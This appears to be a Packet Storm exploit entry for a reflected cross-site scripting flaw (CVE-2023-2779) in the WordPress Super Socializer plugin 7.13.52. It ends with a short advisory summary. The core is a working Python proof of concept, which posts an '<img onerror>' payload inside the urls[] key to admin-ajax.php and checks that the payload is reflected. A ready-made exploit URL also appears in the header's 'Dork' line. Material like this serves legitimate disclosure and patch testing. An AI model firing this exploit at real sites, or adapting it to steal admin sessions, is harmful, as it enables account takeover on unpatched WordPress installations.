
WordPress Super Socializer 7.13.52 Cross Site Scripting

WordPress Super Socializer plugin version 7.13.52 suffers from a cross site scripting vulnerability.

Packet Storm
#xss#vulnerability#web#windows#google#linux#wordpress#php#perl#auth
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779

import requests

# The URL of the vulnerable AJAX endpoint (admin-ajax.php answers both GET and POST)
url = "https://example.com/wp-admin/admin-ajax.php"

# The vulnerable parameter that is not properly sanitized and escaped.
# The markup is placed in the array *key* of urls[], which the plugin
# echoes back into the response.
vulnerable_param = "<img src=x onerror=alert(document.domain)>"

# The payload that exploits the vulnerability
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}

# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload)

# Check whether the injected <img> element is reflected verbatim. This is a
# plain substring test: an entity-encoded reflection (&lt;img ...&gt;) will
# not match and is reported as not exploitable.
if "<img src=x onerror=alert(document.domain)>" in response.text:
    print("Vulnerability successfully exploited")
else:
    print("Vulnerability not exploitable")

Related news

CVE-2023-2779

The Social Share, Social Login and Social Comments WordPress plugin before 7.13.52 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
